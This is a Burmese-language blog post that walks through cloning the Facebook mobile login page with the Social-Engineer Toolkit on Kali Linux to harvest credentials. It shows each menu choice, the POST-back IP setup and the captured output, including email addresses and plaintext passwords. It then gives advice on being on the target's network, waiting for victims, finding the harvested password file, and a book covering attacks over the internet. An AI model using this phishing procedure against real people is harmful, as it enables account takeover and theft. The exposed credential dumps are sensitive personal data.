News Update : I'm Repairing This Blog now. Thanks.
Home » , » Social Engineering Attack / Website Cloning (ျမန္မာလို)

Social Engineering Attack / Website Cloning (ျမန္မာလို)

Penulis : KhitMinnyo on Thursday, November 30, 2017 | November 30, 2017



Kali Linux
Make clone website with se toolkit
.
ေရးထားတာ ၾကာပါျပီ။ 2015 ကတည္းက ေရးခဲ့တာေလးပါ
.........................................
Terminal မွာ setoolkit လို႔ ရိုက္ေခၚလိုက္ပါ။ မွတ္မိလြယ္ေအာင္ ဒီိလို မွတ္ထားပါ (se tool kit) ေပါ့။ ရိုက္ရင္ေတာ့ ေပါင္းရိုက္ရတယ္ေနာ္။

root@kmn:~# setoolkit
ၾကားမွာ စာေတြ အမ်ားႀကီး ေဖ်ာက္ထားပါတယ္။ ေအာက္ဆံုး စာတန္းကိုပဲ အဓိက ေျပာခ်င္လို႔ပါ။ agreement ေမးတာေပါ့။
Do you agree to the terms of service [y/n]: y  ပဲ ေျဖရပါမယ္။
ဒါဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔ setoolkit ကို အသံုးျပဳႏိုင္ျပီျဖစ္ပါတယ္။

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>
 သူ႔ရဲ႕ menu ေလးေတြကို ၾကည့္ရေအာင္ပါ။
အထက္ပါအတိုင္းပဲ ရွင္းရွင္းေလး ေဖာ္ျပထားတာကို ေတြ႕ရပါတယ္။ ကြ်န္ေတာ္ကေတာ့ ဒီေနရာမွာ Site clone လုပ္မွာျဖစ္လို႔ 1 ကိုပဲ ေရြးပါတယ္
set> 1 ေရးျပီး enter လိုက္ပါတယ္။ ေအာက္ပါအတိုင္း ေတြ႕ရပါတယ္။ 1 ထဲမွာတင္ ထပ္မံ ခြဲထားတဲ့ menu ေတြပါ။

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 2 ကို ေရးလိုက္ပါတယ္။ Website Attack Vectors ကို သံုးမွာမို႔ပါ။ အေပၚက menu မွာ ျပန္ၾကည့္ရင္ 2) Website Attack Vectors ဆိုတာကို ေတြ႔ရမွာပါ။


ဘာက ဘာအတြက္ဆိုတာကို ENG လို ရွင္းျပထားတာေတြ ဒီအေပၚမွာ ရွိပါေသးတယ္။
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>3
   3) Credential Harvester Attack Method ကို သံုးမွာမို႔ ကြ်န္ေတာ္က  ၃  ေရြးလိုက္ပါတယ္။

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
 
   1) Web Templates
   2) Site Cloner #site ကို clone လုပ္မွာမို႔ ဒီ ဟာကိုပဲ သံုးပါမယ္။
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>
   2) Site Cloner ေနာ္

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:ဒီေနရာမွာ မိမိရဲ႕ ip address ကို ျဖည့္ရမွာျဖစ္ပါတယ္။ (ifconfig)

set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.10.10
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://m.facebook.com  ဒီေနရာမွာ ကိုယ္ clone လုပ္မယ့္ site ကို ျဖည့္ရမွာပါ။ ကြ်န္ေတာ္ကေတာ့ mobile user ကို target ထားျပီး ဒီလိုျဖည့္လိုက္ျခင္း ျဖစ္ပါတယ္။

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y
ဒီေနရာမွာ service apache start လုပ္မထားရေသးလို႔ ေမးတာပါ။ ကြ်န္ေတာ္ေျဖျပထားသလို y ေပါ့

[ ok ] Starting apache2 (via systemctl): apache2.service.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www/html directory
[*] All files have been copied to /var/www/html
[*] SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.
[*] All files are located under the Apache web root directory: /var/www/html
[*] All fields captures will be displayed below.
[Credential Harvester is now listening below...]

ခုဆိုရင္ေတာ့ ကြ်န္ေတာ့္ target ဆီက ဝင္လာမယ့္ အခ်ိန္ကို ေစာင့္ေနျပီျဖစ္ပါတယ္။ သူ႔ဆီကို ေပးရမယ့္ link က ကြ်န္ေတာ္တို႔ ျဖည့္ခဲ့တဲ့ ip address ပါပဲ။
ကြ်န္ေတာ္က ေနရာ သံုးခုကေန ဝင္ျပထားပါတယ္


('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => 480\n',)
('    [lgndim] => eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0=\n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => 1491186248\n',)
('    [email] => khitminnyo@gmail.com\n',)
('    [pass] => appleasdfghjkl\n',)
(')\n',)
('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => -390\n',)
('    [lgndim] => eyJ3IjozOTMsImgiOjY5OSwiYXciOjM5MywiYWgiOjY5OSwiYyI6MzJ9\n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => 1491200662\n',)
('    [email] => admin@khitminnyo.com\n',)
('    [pass] => ilovekalilinux2016.2\n',)
(')\n',)
('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => \n',)
('    [lgndim] => \n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => n\n',)
('    [email] => aeroplane@gmail.com\n',)
('    [pass] => flying123456\n',)
('    [login] => 1\n',)
(')\n',)



ဒီအခ်က္ေတြကို အသံုးျပဳဖို႔အတြက္ေတာ့ သတိထားစရာအခ်က္ ၂ခု ရွိပါတယ္။
၁။ ကိုယ့္ target နဲ႔ ကိုယ္ဟာ network တစ္ခုတည္းေအာက္မွာ ရွိေနရမယ္။ (same network)
၂။ မိမိ လိုခ်င္တာကို မရမခ်င္း အင္တာနက္ ခ်ိတ္ဆက္ထားဖို႔ လိုအပ္မွာ ျဖစ္ပါတယ္။
(Same Network မဟုတ္ဘဲ WAN မွာ အသံုးျပဳႏိုင္ဖို႔အတြက္ေတာ့ နည္းလမ္းေလးေတြ လိုပါတယ္)
ေအာက္ပါစာအုပ္ေလး မွာ အျပည့္အစံု ပါဝင္မွာျဖစ္ပါတယ္။ 😀😀😀
ဒီဇင္ဘာလ ၃ ရက္ေန႔မွာ စတင္ ျဖန္႔ခ်ီသြားမွာျဖစ္ပါတယ္။ စာအုပ္ေလးထဲမွာ Member Form ေလး တစ္ခု ပါ၀င္ျပီး Facebook Group ထဲ ဝင္ေရာက္ခြင့္ နဲ႔ http://www.mmaiotraining.org ကို ၀င္ေရာက္ၾကည့္ရႈခြင့္ပါ ပူးတြဲ ရရွိိမွာျဖစ္ပါတယ္။
မွတ္ခ်က္။      ။ www.khitminnyo.com တြင္ တင္ထားေသာ အေၾကာင္းအရာမ်ားႏွင့္ စာအုပ္တြင္ ပါဝင္သည့္ အေၾကာင္းအရာမ်ားသည္ တူညီျခင္း မရွိပါ။


terminal ကို ပိတ္လိုက္လည္း ရပါတယ္။ ကြန္ပ်ဴတာ မပိတ္ဖို႔နဲ႔ ကြန္ပ်ဴတာမွာ အင္တာနက္ ခ်ိတ္ထားဖို႔ သာ အဓိက လိုအပ္ပါတယ္။

ကိုယ္လိုခ်င္တာ မရမီေတာ့ ဒီလိုပဲ ေစာင့္ရမွာျဖစ္ပါတယ္။
အဲမွာ အားနည္းခ်က္တစ္ခု ရွိတာကေတာ့ ကြ်န္ေတာ္တို႔ ေပးတဲ့ ip link ကို ဖြင့္လိုက္တယ္ဆိုပါစို႔။ mail နဲ႔  password မွားသြားရင္ျဖစ္ျဖစ္ မွန္သြားရင္ျဖစ္ျဖစ္ မူလ website အစစ္ထဲကို ေရာက္သြားမွာျဖစ္ပါတယ္

password ဖိုင္ကို သြားဖြင့္ၾကည့္ခ်င္ရင္ေတာ့ file  >> other location >> Computer >> var >> www >> html ထဲမွာသြားဖြင့္ၾကည့္ႏိုင္ပါတယ္။
..............................................................................................................

Thanks


Khit Minnyo
Share this article :

Post a Comment

 
Copyright © 2011. Khit Minnyo . All Rights Reserved.